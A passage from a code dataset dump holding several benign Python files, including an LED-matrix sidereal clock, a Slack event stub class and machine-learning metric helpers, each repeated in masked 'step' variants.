key, category):\n if not category: \n raise AssertionError(\"Category is required\")\n if len(category) < 3:\n raise AssertionError(\"Category must be at least 3 character\")\n return category\n \n @validates(\"status\")\n def validate_status(self, key, status):\n if not status: \n raise AssertionError(\"Status is required\")\n elif status not in ['Publish', 'Draft', 'Thrash']:\n raise AssertionError(\"{} is not supported status\".format(status))\n return status\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import time
import math
from random import randrange
import multilineMAX7219 as LEDMatrix
from multilineMAX7219_fonts import CP437_FONT, SINCLAIRS_FONT, LCD_FONT, TINY_FONT
from multilineMAX7219 import DIR_L, DIR_R, DIR_U, DIR_D
from multilineMAX7219 import DIR_LU, DIR_RU, DIR_LD, DIR_RD
from multilineMAX7219 import DISSOLVE, GFX_ON, GFX_OFF, GFX_INVERT
import datetime,ephem
from myfont import f
def utlst():
gtc = ephem.Observer()
gtc.lat, gtc.lon, gtc.elevation = '28.7565187', '-17.8919956', 2175.0
t = "%s %s" % (gtc.date,gtc.sidereal_time())
p = t.split(" ")
lst=p[2].split(".")
ut=p[1]
return ut,lst[0]
def at(x,y,string,state=GFX_ON):
for c in string:
LEDMatrix.gfx_sprite_array(f[ord(c)-48],x,y,state)
x+=len(f[ord(c)-48][0])
if c == ":" : x-=7
if c >= "A" : x-=1
# Initialise the library and the MAX7219/8x8LED arrays
LEDMatrix.init()
LEDMatrix.brightness(5)
sun, moon = ephem.Sun(), ephem.Moon()
gtc = ephem.Observer()
gtc.lat, gtc.lon, gtc.elevation = '28.7565187', '-17.8919956', 2175.0
print gtc.date, gtc.sidereal_time()
print gtc.lon, gtc.lat
try:
while 1:
ut,lst=utlst()
sut="%s" % ut
slst="%s" % lst
if len(slst) < 8: slst = "0"+slst
at(0,16,"UT%s" % sut)
at(0, 0,"ST%s" % slst)
LEDMatrix.gfx_render()
time.sleep(0.1)
except KeyboardInterrupt:
# reset array
LEDMatrix.clear_all()
|
normal
|
{
"blob_id": "ba486b64b1da3dc1775bee0980d5236516e130d4",
"index": 4033,
"step-1": "import time\nimport math\nfrom random import randrange\n\nimport multilineMAX7219 as LEDMatrix\nfrom multilineMAX7219_fonts import CP437_FONT, SINCLAIRS_FONT, LCD_FONT, TINY_FONT\nfrom multilineMAX7219 import DIR_L, DIR_R, DIR_U, DIR_D\nfrom multilineMAX7219 import DIR_LU, DIR_RU, DIR_LD, DIR_RD\nfrom multilineMAX7219 import DISSOLVE, GFX_ON, GFX_OFF, GFX_INVERT\nimport datetime,ephem\nfrom myfont import f\n\ndef utlst():\n gtc = ephem.Observer()\n gtc.lat, gtc.lon, gtc.elevation = '28.7565187', '-17.8919956', 2175.0\n t = \"%s %s\" % (gtc.date,gtc.sidereal_time())\n p = t.split(\" \")\n lst=p[2].split(\".\")\n ut=p[1]\n return ut,lst[0]\n\ndef at(x,y,string,state=GFX_ON):\n for c in string:\n LEDMatrix.gfx_sprite_array(f[ord(c)-48],x,y,state)\n x+=len(f[ord(c)-48][0])\n if c == \":\" : x-=7\n if c >= \"A\" : x-=1\n\n\n\n# Initialise the library and the MAX7219/8x8LED arrays\nLEDMatrix.init()\nLEDMatrix.brightness(5)\nsun, moon = ephem.Sun(), ephem.Moon()\n\ngtc = ephem.Observer()\ngtc.lat, gtc.lon, gtc.elevation = '28.7565187', '-17.8919956', 2175.0\nprint gtc.date, gtc.sidereal_time()\nprint gtc.lon, gtc.lat\n\ntry:\n while 1:\n ut,lst=utlst()\n sut=\"%s\" % ut\n slst=\"%s\" % lst \n if len(slst) < 8: slst = \"0\"+slst\n at(0,16,\"UT%s\" % sut)\n at(0, 0,\"ST%s\" % slst)\n LEDMatrix.gfx_render()\n time.sleep(0.1)\n\nexcept KeyboardInterrupt:\n # reset array\n LEDMatrix.clear_all()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
class SlackEvent:
@property
def client_msg_id(self):
pass
@property
def type(self):
pass
@property
def subtype(self):
pass
@property
def text(self):
pass
@property
def time_stamp(self):
pass
@property
def channel(self):
pass
@property
def channel_id(self):
pass
@property
def event_time_stamp(self):
pass
@property
def channel_type(self):
pass
@property
def thread_time_stamp(self):
pass
@property
def user(self):
pass
@property
def user_id(self):
pass
@property
def bot_id(self):
pass
@property
def actions(self):
pass
@property
def item(self):
pass
@property
def item_channel(self):
pass
@property
def files(self):
pass
@property
def message(self):
pass
|
normal
|
{
"blob_id": "4a4745f202275e45fd78c12431e355fd59ac964a",
"index": 6722,
"step-1": "class SlackEvent:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def time_stamp(self):\n pass\n\n @property\n def channel(self):\n pass\n <mask token>\n\n @property\n def event_time_stamp(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def user_id(self):\n pass\n\n @property\n def bot_id(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def files(self):\n pass\n\n @property\n def message(self):\n pass\n",
"step-2": "class SlackEvent:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def time_stamp(self):\n pass\n\n @property\n def channel(self):\n pass\n <mask token>\n\n @property\n def event_time_stamp(self):\n pass\n\n @property\n def channel_type(self):\n pass\n <mask token>\n <mask token>\n\n @property\n def user_id(self):\n pass\n\n @property\n def bot_id(self):\n pass\n <mask token>\n <mask token>\n\n @property\n def item_channel(self):\n pass\n\n @property\n def files(self):\n pass\n\n @property\n def message(self):\n pass\n",
"step-3": "class SlackEvent:\n\n @property\n def client_msg_id(self):\n pass\n <mask token>\n\n @property\n def subtype(self):\n pass\n\n @property\n def text(self):\n pass\n\n @property\n def time_stamp(self):\n pass\n\n @property\n def channel(self):\n pass\n\n @property\n def channel_id(self):\n pass\n\n @property\n def event_time_stamp(self):\n pass\n\n @property\n def channel_type(self):\n pass\n <mask token>\n\n @property\n def user(self):\n pass\n\n @property\n def user_id(self):\n pass\n\n @property\n def bot_id(self):\n pass\n <mask token>\n <mask token>\n\n @property\n def item_channel(self):\n pass\n\n @property\n def files(self):\n pass\n\n @property\n def message(self):\n pass\n",
"step-4": "class SlackEvent:\n\n @property\n def client_msg_id(self):\n pass\n\n @property\n def type(self):\n pass\n\n @property\n def subtype(self):\n pass\n\n @property\n def text(self):\n pass\n\n @property\n def time_stamp(self):\n pass\n\n @property\n def channel(self):\n pass\n\n @property\n def channel_id(self):\n pass\n\n @property\n def event_time_stamp(self):\n pass\n\n @property\n def channel_type(self):\n pass\n <mask token>\n\n @property\n def user(self):\n pass\n\n @property\n def user_id(self):\n pass\n\n @property\n def bot_id(self):\n pass\n\n @property\n def actions(self):\n pass\n <mask token>\n\n @property\n def item_channel(self):\n pass\n\n @property\n def files(self):\n pass\n\n @property\n def message(self):\n pass\n",
"step-5": "class SlackEvent:\r\n @property\r\n def client_msg_id(self):\r\n pass\r\n\r\n @property\r\n def type(self):\r\n pass\r\n\r\n @property\r\n def subtype(self):\r\n pass\r\n\r\n @property\r\n def text(self):\r\n pass\r\n\r\n @property\r\n def time_stamp(self):\r\n pass\r\n\r\n @property\r\n def channel(self):\r\n pass\r\n\r\n @property\r\n def channel_id(self):\r\n pass\r\n\r\n @property\r\n def event_time_stamp(self):\r\n pass\r\n\r\n @property\r\n def channel_type(self):\r\n pass\r\n\r\n @property\r\n def thread_time_stamp(self):\r\n pass\r\n\r\n @property\r\n def user(self):\r\n pass\r\n\r\n @property\r\n def user_id(self):\r\n pass\r\n\r\n @property\r\n def bot_id(self):\r\n pass\r\n\r\n @property\r\n def actions(self):\r\n pass\r\n\r\n @property\r\n def item(self):\r\n pass\r\n\r\n @property\r\n def item_channel(self):\r\n pass\r\n\r\n @property\r\n def files(self):\r\n pass\r\n\r\n @property\r\n def message(self):\r\n pass\r\n",
"step-ids": [
8,
10,
15,
17,
20
]
}
|
[
8,
10,
15,
17,
20
] |
from Cars import Bmw
from Cars import Audi
from Cars import Nissan
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
print('In Sample.py........')
# Import classes from your brand new package
# Create an object of Bmw class & call its method
ModBMW = Bmw.Bmw()
ModBMW.outModels()
# Create an object of Audi class & call its method
ModAudi = Audi.Audi()
ModAudi.outModels()
# Create an object of Nissan class & call its method
ModNissan = Nissan.Nissan()
ModNissan.outModels()
|
normal
|
{
"blob_id": "e15524d7ae87cbf0b10c54ee0bdc613ba589c1a9",
"index": 3812,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n print('In Sample.py........')\n ModBMW = Bmw.Bmw()\n ModBMW.outModels()\n ModAudi = Audi.Audi()\n ModAudi.outModels()\n ModNissan = Nissan.Nissan()\n ModNissan.outModels()\n",
"step-3": "from Cars import Bmw\nfrom Cars import Audi\nfrom Cars import Nissan\nif __name__ == '__main__':\n print('In Sample.py........')\n ModBMW = Bmw.Bmw()\n ModBMW.outModels()\n ModAudi = Audi.Audi()\n ModAudi.outModels()\n ModNissan = Nissan.Nissan()\n ModNissan.outModels()\n",
"step-4": "from Cars import Bmw\nfrom Cars import Audi\nfrom Cars import Nissan\n\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print('In Sample.py........')\n\n # Import classes from your brand new package\n\n # Create an object of Bmw class & call its method\n ModBMW = Bmw.Bmw()\n ModBMW.outModels()\n\n # Create an object of Audi class & call its method\n ModAudi = Audi.Audi()\n ModAudi.outModels()\n\n # Create an object of Nissan class & call its method\n ModNissan = Nissan.Nissan()\n ModNissan.outModels()",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sklearn.metrics import roc_auc_score, matthews_corrcoef, f1_score, confusion_matrix
import numpy as np
from scipy.stats import rankdata
def iou_score(target, prediction):
intersection = np.logical_and(target, prediction)
union = np.logical_or(target, prediction)
iou_score = np.sum(intersection) / (np.sum(union) + 1e-6)
return iou_score
def dice_score(actual, predicted):
actual = np.asarray(actual).astype(np.bool)
predicted = np.asarray(predicted).astype(np.bool)
im_sum = actual.sum() + predicted.sum()
if im_sum == 0: return 1
intersection = np.logical_and(actual, predicted)
return 2. * intersection.sum() / im_sum
def accuracy_score(actual, predicted):
actual = np.asarray(actual).astype(np.bool)
predicted = np.asarray(predicted).astype(np.bool)
num_els = actual.size
intersection = np.logical_and(actual, predicted)
return float(intersection.sum()) / num_els
def fast_auc(actual, predicted):
r = rankdata(predicted)
n_pos = np.sum(actual)
n_neg = len(actual) - n_pos
return (np.sum(r[actual==1]) - n_pos*(n_pos+1)/2) / (n_pos*n_neg)
def print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None, text_file=None):
"""
pretty print for confusion matrixes
https://gist.github.com/zachguo/10296432
"""
if text_file is None: print("\n", end=" ")
else: print("\n", end=" ", file=open(text_file, "a"))
columnwidth = max([len(x) for x in labels] + [5]) # 5 is value length
empty_cell = " " * columnwidth
fst_empty_cell = (columnwidth - 3) // 2 * " " + "t/p" + (columnwidth - 3) // 2 * " "
if len(fst_empty_cell) < len(empty_cell):
fst_empty_cell = " " * (len(empty_cell) - len(fst_empty_cell)) + fst_empty_cell
# Print header
if text_file is None: print(" " + fst_empty_cell, end=" ")
else: print(" " + fst_empty_cell, end=" ", file = open(text_file, "a"))
for label in labels:
if text_file is None: print("%{0}s".format(columnwidth) % label, end=" ")
else: print("%{0}s".format(columnwidth) % label, end=" ", file = open(text_file, "a"))
if text_file is None: print()
else: print(' ', file = open(text_file, "a"))
# Print rows
for i, label1 in enumerate(labels):
if text_file is None: print(" %{0}s".format(columnwidth) % label1, end=" ")
else: print(" %{0}s".format(columnwidth) % label1, end=" ", file = open(text_file, "a"))
for j in range(len(labels)):
cell = "%{}d".format(columnwidth) % cm[i, j]
if hide_zeroes:
cell = cell if float(cm[i, j]) != 0 else empty_cell
if hide_diagonal:
cell = cell if i != j else empty_cell
if hide_threshold:
cell = cell if cm[i, j] > hide_threshold else empty_cell
if text_file is None: print(cell, end=" ")
else: print(cell, end=" ", file = open(text_file, "a"))
if text_file is None: print()
else: print(' ', file = open(text_file, "a"))
def evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=None, class_names=None):
classes, _ = np.unique(y_true, return_counts=True)
if class_names is None:
class_names = [str(n) for n in classes]
f1 = f1_score(y_true, y_pred, average='micro')
mcc = matthews_corrcoef(y_true, y_pred)
if len(classes)==2:
mean_auc = roc_auc_score(y_true, y_proba[:,1])
else:
mean_auc = roc_auc_score(y_true, y_proba, average='weighted', multi_class='ovo')
# mean_auc = roc_auc_score(y_true, y_proba, average='weighted', multi_class='ovr')
# ovo should be better, but average is not clear from docs
# mean_auc = roc_auc_score(y_true, y_proba, average='macro', multi_class='ovo')
if print_conf:
if text_file is not None:
print("\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}".format(100*mcc, 100*f1, 100*mean_auc), end=" ", file=open(text_file, "a"))
cm = confusion_matrix(y_true, y_pred, labels=classes)
print_cm(cm, class_names, text_file=text_file)
return mean_auc, mcc, f1
|
normal
|
{
"blob_id": "c599a75788e3548c52ebb3b29e7a2398ff1b28a2",
"index": 1808,
"step-1": "<mask token>\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-06)\n return iou_score\n\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0:\n return 1\n intersection = np.logical_and(actual, predicted)\n return 2.0 * intersection.sum() / im_sum\n\n\n<mask token>\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False,\n hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None:\n print('\\n', end=' ')\n else:\n print('\\n', end=' ', file=open(text_file, 'a'))\n columnwidth = max([len(x) for x in labels] + [5])\n empty_cell = ' ' * columnwidth\n fst_empty_cell = (columnwidth - 3) // 2 * ' ' + 't/p' + (columnwidth - 3\n ) // 2 * ' '\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = ' ' * (len(empty_cell) - len(fst_empty_cell)\n ) + fst_empty_cell\n if text_file is None:\n print(' ' + fst_empty_cell, end=' ')\n else:\n print(' ' + fst_empty_cell, end=' ', file=open(text_file, 'a'))\n for label in labels:\n if text_file is None:\n print('%{0}s'.format(columnwidth) % label, end=' ')\n else:\n print('%{0}s'.format(columnwidth) % label, end=' ', file=open(\n text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n for i, label1 in enumerate(labels):\n if text_file is None:\n print(' %{0}s'.format(columnwidth) % label1, end=' ')\n else:\n print(' %{0}s'.format(columnwidth) % label1, end=' ', file=\n open(text_file, 'a'))\n for j in range(len(labels)):\n cell = '%{}d'.format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None:\n print(cell, end=' ')\n else:\n print(cell, end=' ', file=open(text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-06)\n return iou_score\n\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0:\n return 1\n intersection = np.logical_and(actual, predicted)\n return 2.0 * intersection.sum() / im_sum\n\n\n<mask token>\n\n\ndef fast_auc(actual, predicted):\n r = rankdata(predicted)\n n_pos = np.sum(actual)\n n_neg = len(actual) - n_pos\n return (np.sum(r[actual == 1]) - n_pos * (n_pos + 1) / 2) / (n_pos * n_neg)\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False,\n hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None:\n print('\\n', end=' ')\n else:\n print('\\n', end=' ', file=open(text_file, 'a'))\n columnwidth = max([len(x) for x in labels] + [5])\n empty_cell = ' ' * columnwidth\n fst_empty_cell = (columnwidth - 3) // 2 * ' ' + 't/p' + (columnwidth - 3\n ) // 2 * ' '\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = ' ' * (len(empty_cell) - len(fst_empty_cell)\n ) + fst_empty_cell\n if text_file is None:\n print(' ' + fst_empty_cell, end=' ')\n else:\n print(' ' + fst_empty_cell, end=' ', file=open(text_file, 'a'))\n for label in labels:\n if text_file is None:\n print('%{0}s'.format(columnwidth) % label, end=' ')\n else:\n print('%{0}s'.format(columnwidth) % label, end=' ', file=open(\n text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n for i, label1 in enumerate(labels):\n if text_file is None:\n print(' %{0}s'.format(columnwidth) % label1, end=' ')\n else:\n print(' %{0}s'.format(columnwidth) % label1, end=' ', file=\n open(text_file, 'a'))\n for j in range(len(labels)):\n cell = '%{}d'.format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None:\n print(cell, end=' ')\n else:\n print(cell, end=' ', file=open(text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n\n\ndef evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=\n None, class_names=None):\n classes, _ = np.unique(y_true, return_counts=True)\n if class_names is None:\n class_names = [str(n) for n in classes]\n f1 = f1_score(y_true, y_pred, average='micro')\n mcc = matthews_corrcoef(y_true, y_pred)\n if len(classes) == 2:\n mean_auc = roc_auc_score(y_true, y_proba[:, 1])\n else:\n mean_auc = roc_auc_score(y_true, y_proba, average='weighted',\n multi_class='ovo')\n if print_conf:\n if text_file is not None:\n print('\\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}'.format(100 *\n mcc, 100 * f1, 100 * mean_auc), end=' ', file=open(\n text_file, 'a'))\n cm = confusion_matrix(y_true, y_pred, labels=classes)\n print_cm(cm, class_names, text_file=text_file)\n return mean_auc, mcc, f1\n",
"step-3": "<mask token>\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-06)\n return iou_score\n\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0:\n return 1\n intersection = np.logical_and(actual, predicted)\n return 2.0 * intersection.sum() / im_sum\n\n\ndef accuracy_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n num_els = actual.size\n intersection = np.logical_and(actual, predicted)\n return float(intersection.sum()) / num_els\n\n\ndef fast_auc(actual, predicted):\n r = rankdata(predicted)\n n_pos = np.sum(actual)\n n_neg = len(actual) - n_pos\n return (np.sum(r[actual == 1]) - n_pos * (n_pos + 1) / 2) / (n_pos * n_neg)\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False,\n hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None:\n print('\\n', end=' ')\n else:\n print('\\n', end=' ', file=open(text_file, 'a'))\n columnwidth = max([len(x) for x in labels] + [5])\n empty_cell = ' ' * columnwidth\n fst_empty_cell = (columnwidth - 3) // 2 * ' ' + 't/p' + (columnwidth - 3\n ) // 2 * ' '\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = ' ' * (len(empty_cell) - len(fst_empty_cell)\n ) + fst_empty_cell\n if text_file is None:\n print(' ' + fst_empty_cell, end=' ')\n else:\n print(' ' + fst_empty_cell, end=' ', file=open(text_file, 'a'))\n for label in labels:\n if text_file is None:\n print('%{0}s'.format(columnwidth) % label, end=' ')\n else:\n print('%{0}s'.format(columnwidth) % label, end=' ', file=open(\n text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n for i, label1 in enumerate(labels):\n if text_file is None:\n print(' %{0}s'.format(columnwidth) % label1, end=' ')\n else:\n print(' %{0}s'.format(columnwidth) % label1, end=' ', file=\n open(text_file, 'a'))\n for j in range(len(labels)):\n cell = '%{}d'.format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None:\n print(cell, end=' ')\n else:\n print(cell, end=' ', file=open(text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n\n\ndef evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=\n None, class_names=None):\n classes, _ = np.unique(y_true, return_counts=True)\n if class_names is None:\n class_names = [str(n) for n in classes]\n f1 = f1_score(y_true, y_pred, average='micro')\n mcc = matthews_corrcoef(y_true, y_pred)\n if len(classes) == 2:\n mean_auc = roc_auc_score(y_true, y_proba[:, 1])\n else:\n mean_auc = roc_auc_score(y_true, y_proba, average='weighted',\n multi_class='ovo')\n if print_conf:\n if text_file is not None:\n print('\\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}'.format(100 *\n mcc, 100 * f1, 100 * mean_auc), end=' ', file=open(\n text_file, 'a'))\n cm = confusion_matrix(y_true, y_pred, labels=classes)\n print_cm(cm, class_names, text_file=text_file)\n return mean_auc, mcc, f1\n",
"step-4": "from sklearn.metrics import roc_auc_score, matthews_corrcoef, f1_score, confusion_matrix\nimport numpy as np\nfrom scipy.stats import rankdata\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-06)\n return iou_score\n\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0:\n return 1\n intersection = np.logical_and(actual, predicted)\n return 2.0 * intersection.sum() / im_sum\n\n\ndef accuracy_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n num_els = actual.size\n intersection = np.logical_and(actual, predicted)\n return float(intersection.sum()) / num_els\n\n\ndef fast_auc(actual, predicted):\n r = rankdata(predicted)\n n_pos = np.sum(actual)\n n_neg = len(actual) - n_pos\n return (np.sum(r[actual == 1]) - n_pos * (n_pos + 1) / 2) / (n_pos * n_neg)\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False,\n hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None:\n print('\\n', end=' ')\n else:\n print('\\n', end=' ', file=open(text_file, 'a'))\n columnwidth = max([len(x) for x in labels] + [5])\n empty_cell = ' ' * columnwidth\n fst_empty_cell = (columnwidth - 3) // 2 * ' ' + 't/p' + (columnwidth - 3\n ) // 2 * ' '\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = ' ' * (len(empty_cell) - len(fst_empty_cell)\n ) + fst_empty_cell\n if text_file is None:\n print(' ' + fst_empty_cell, end=' ')\n else:\n print(' ' + fst_empty_cell, end=' ', file=open(text_file, 'a'))\n for label in labels:\n if text_file is None:\n print('%{0}s'.format(columnwidth) % label, end=' ')\n else:\n print('%{0}s'.format(columnwidth) % label, end=' ', file=open(\n text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n for i, label1 in enumerate(labels):\n if text_file is None:\n print(' %{0}s'.format(columnwidth) % label1, end=' ')\n else:\n print(' %{0}s'.format(columnwidth) % label1, end=' ', file=\n open(text_file, 'a'))\n for j in range(len(labels)):\n cell = '%{}d'.format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None:\n print(cell, end=' ')\n else:\n print(cell, end=' ', file=open(text_file, 'a'))\n if text_file is None:\n print()\n else:\n print(' ', file=open(text_file, 'a'))\n\n\ndef evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=\n None, class_names=None):\n classes, _ = np.unique(y_true, return_counts=True)\n if class_names is None:\n class_names = [str(n) for n in classes]\n f1 = f1_score(y_true, y_pred, average='micro')\n mcc = matthews_corrcoef(y_true, y_pred)\n if len(classes) == 2:\n mean_auc = roc_auc_score(y_true, y_proba[:, 1])\n else:\n mean_auc = roc_auc_score(y_true, y_proba, average='weighted',\n multi_class='ovo')\n if print_conf:\n if text_file is not None:\n print('\\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}'.format(100 *\n mcc, 100 * f1, 100 * mean_auc), end=' ', file=open(\n text_file, 'a'))\n cm = confusion_matrix(y_true, y_pred, labels=classes)\n print_cm(cm, class_names, text_file=text_file)\n return mean_auc, mcc, f1\n",
"step-5": "from sklearn.metrics import roc_auc_score, matthews_corrcoef, f1_score, confusion_matrix\nimport numpy as np\nfrom scipy.stats import rankdata\n\n\ndef iou_score(target, prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / (np.sum(union) + 1e-6)\n return iou_score\n\ndef dice_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n im_sum = actual.sum() + predicted.sum()\n if im_sum == 0: return 1\n intersection = np.logical_and(actual, predicted)\n return 2. * intersection.sum() / im_sum\n\ndef accuracy_score(actual, predicted):\n actual = np.asarray(actual).astype(np.bool)\n predicted = np.asarray(predicted).astype(np.bool)\n num_els = actual.size\n intersection = np.logical_and(actual, predicted)\n return float(intersection.sum()) / num_els\n\ndef fast_auc(actual, predicted):\n r = rankdata(predicted)\n n_pos = np.sum(actual)\n n_neg = len(actual) - n_pos\n return (np.sum(r[actual==1]) - n_pos*(n_pos+1)/2) / (n_pos*n_neg)\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None, text_file=None):\n \"\"\"\n pretty print for confusion matrixes\n https://gist.github.com/zachguo/10296432\n \"\"\"\n if text_file is None: print(\"\\n\", end=\" \")\n else: print(\"\\n\", end=\" \", file=open(text_file, \"a\"))\n\n columnwidth = max([len(x) for x in labels] + [5]) # 5 is value length\n empty_cell = \" \" * columnwidth\n\n fst_empty_cell = (columnwidth - 3) // 2 * \" \" + \"t/p\" + (columnwidth - 3) // 2 * \" \"\n\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = \" \" * (len(empty_cell) - len(fst_empty_cell)) + fst_empty_cell\n # Print header\n if text_file is None: print(\" \" + fst_empty_cell, end=\" \")\n else: print(\" \" + fst_empty_cell, end=\" \", file = open(text_file, \"a\"))\n\n for label in labels:\n if text_file is None: print(\"%{0}s\".format(columnwidth) % label, end=\" \")\n else: print(\"%{0}s\".format(columnwidth) % label, end=\" \", file = open(text_file, \"a\"))\n if text_file is None: print()\n else: print(' ', file = open(text_file, \"a\"))\n # Print rows\n for i, label1 in enumerate(labels):\n if text_file is None: print(\" %{0}s\".format(columnwidth) % label1, end=\" \")\n else: print(\" %{0}s\".format(columnwidth) % label1, end=\" \", file = open(text_file, \"a\"))\n for j in range(len(labels)):\n cell = \"%{}d\".format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n if text_file is None: print(cell, end=\" \")\n else: print(cell, end=\" \", file = open(text_file, \"a\"))\n if text_file is None: print()\n else: print(' ', file = open(text_file, \"a\"))\n\ndef evaluate_multi_cls(y_true, y_pred, y_proba, print_conf=True, text_file=None, class_names=None):\n classes, _ = np.unique(y_true, return_counts=True)\n if class_names is None:\n class_names = [str(n) for n in classes]\n\n f1 = f1_score(y_true, y_pred, average='micro')\n mcc = matthews_corrcoef(y_true, y_pred)\n if len(classes)==2:\n mean_auc = roc_auc_score(y_true, y_proba[:,1])\n else:\n mean_auc = roc_auc_score(y_true, y_proba, average='weighted', multi_class='ovo')\n\n # mean_auc = roc_auc_score(y_true, y_proba, average='weighted', multi_class='ovr')\n # ovo should be better, but average is not clear from docs\n # mean_auc = roc_auc_score(y_true, y_proba, average='macro', multi_class='ovo')\n\n if print_conf:\n if text_file is not None:\n print(\"\\nMCC={:.2f} -- F1={:.2f} -- AUC={:.2f}\".format(100*mcc, 100*f1, 100*mean_auc), end=\" \", file=open(text_file, \"a\"))\n cm = confusion_matrix(y_true, y_pred, labels=classes)\n print_cm(cm, class_names, text_file=text_file)\n\n return mean_auc, mcc, f1",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
"""URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
